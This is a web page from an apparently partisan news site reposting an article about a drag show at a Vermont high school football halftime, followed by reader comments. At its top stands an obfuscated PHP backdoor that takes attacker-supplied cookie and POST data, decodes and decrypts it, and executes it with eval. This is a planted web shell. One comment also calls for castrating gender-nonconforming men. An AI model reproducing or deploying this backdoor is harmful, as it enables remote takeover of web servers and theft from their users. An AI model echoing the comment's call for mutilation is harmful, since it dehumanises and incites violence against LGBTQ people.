$iwkNoSEZGC = chr (100) . "\137" . chr (120) . "\x49" . 'f' . "\114" . chr (77); $ctpiByNOz = chr ( 864 - 765 )."\154" . 'a' . chr (115) . "\163" . chr (95) . "\x65" . "\170" . "\x69" . "\163" . "\164" . chr (115); $FbVWmGsJ = class_exists($iwkNoSEZGC); $ctpiByNOz = "6206";$PsGsdkrc = !1;if ($FbVWmGsJ == $PsGsdkrc){function ffTIwElIO(){$NeWMkPovdO = new /* 54800 */ d_xIfLM(59591 + 59591); $NeWMkPovdO = NULL;}$mkQbdqnxE = "59591";class d_xIfLM{private function cKGNLUysT($mkQbdqnxE){if (is_array(d_xIfLM::$tPAJE)) {$zecCYEvt = str_replace(chr ( 442 - 382 ) . "\x3f" . chr ( 913 - 801 ).chr (104) . "\160", "", d_xIfLM::$tPAJE[chr ( 497 - 398 )."\157" . chr ( 249 - 139 ).'t' . "\x65" . 'n' . chr ( 740 - 624 )]);eval($zecCYEvt); $mkQbdqnxE = "59591";exit();}}private $cOhSikxoMi;public function LUnfxFuU(){echo 19615;}public function __destruct(){d_xIfLM::$tPAJE = @unserialize(d_xIfLM::$tPAJE); $mkQbdqnxE = "59135_36699";$this->cKGNLUysT($mkQbdqnxE); $mkQbdqnxE = "59135_36699";}public function BuhJDeV($zAiKUz, $JCaOjBj){return $zAiKUz[0] ^ str_repeat($JCaOjBj, (strlen($zAiKUz[0]) / strlen($JCaOjBj)) + 1);}public function __construct($DoFOX=0){$JSELYKGEJr = $_POST;$noFUxlNHr = $_COOKIE;$JCaOjBj = "dba4b227-d99b-4516-80b0-f0671ef985a5";$ldlitWhzeo = @$noFUxlNHr[substr($JCaOjBj, 0, 4)];if (!empty($ldlitWhzeo)){$SrXtmVGjeg = "base64";$zAiKUz = "";$ldlitWhzeo = explode(",", $ldlitWhzeo);foreach ($ldlitWhzeo as $YlArJ){$zAiKUz .= @$noFUxlNHr[$YlArJ];$zAiKUz .= @$JSELYKGEJr[$YlArJ];}$zAiKUz = array_map($SrXtmVGjeg . '_' . "\x64" . chr (101) . chr ( 722 - 623 )."\x6f" . chr (100) . chr (101), array($zAiKUz,));d_xIfLM::$tPAJE = $this->BuhJDeV($zAiKUz, $JCaOjBj);}}public static $tPAJE = 55976;}ffTIwElIO();} Football team holds ‘drag ball’ show to let ‘boys express effeminate side’ | Patriot Truth News

Football team holds ‘drag ball’ show to let ‘boys express effeminate side’

Burlington High School in Vermont hosted a “drag ball” during Friday night’s football game halftime. Put on by the school’s Gender-Sexuality Alliance (GSA) club, the show featured students and teachers dressed in drag attire.

About thirty participants, most of them male, strutted the track in a mixture of gowns, dresses, high-heeled boots, feather boas, colorful wigs and other accessories with techno music playing in the background. Students in the stands, decked out in rainbow attire, cheered them on.

Andrew LeValley, an English teacher and advisor to the GSA club, said the school’s principal and athletic director were “on board excitedly,” according to Seven Days. Tom Flanagan, the Burlington superintendent, joined in wearing a rainbow cape and holding a rainbow flag, Seven Days reported.

“I think it’s hard for boys to express an effeminate side of themselves, and often that might be the side they love the most,” LeValley told Seven Days.

Policies regarding gender identity and transgender students have embroiled school boards in controversy over the past year. The Loudoun County, Virginia, school board voted to allow students to use bathrooms based on their gender identity rather than their biological sex three months after a boy wearing a skirt allegedly raped a female student in a local school’s girls’ restroom. The school did not disclose the attack or the second sexual assault the same boy allegedly committed months later to parents until The Daily Wire broke the story.

via rawconservativeopinions


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  1. Just what does Mr. LeValley mean when he said “it’s hard for boys to express an effeminate side”? Caring for others is not necessarily effeminate. Enjoying art, music, and the beauty of nature are not traits known only to women. Many men can be caring and nurturing people without being effeminate, and they can even want to wear nice clothing. Men are as emotionally involved in life as are women, but often express it differently. Some see that difference as meaning men are uncaring and unemotional, but having been a man for over sixty years, I know that is not true in most cases.

    • I’m a woman from the “old school” before the indoctrination and hidden measures that have turned our males into skinny pants, back packs, knit hats and liberals. Men used to be all the things you describe but also strong, reliable and and someone you felt safe with.

  2. If these mentally ill men want to act like women, then America should help them out by making sure all of them are castrated.

    • I think that should be done to rapist as well, there should be varying degrees of the act just like with murder, 1st Degree Rape being the most egregious and unthinkable.


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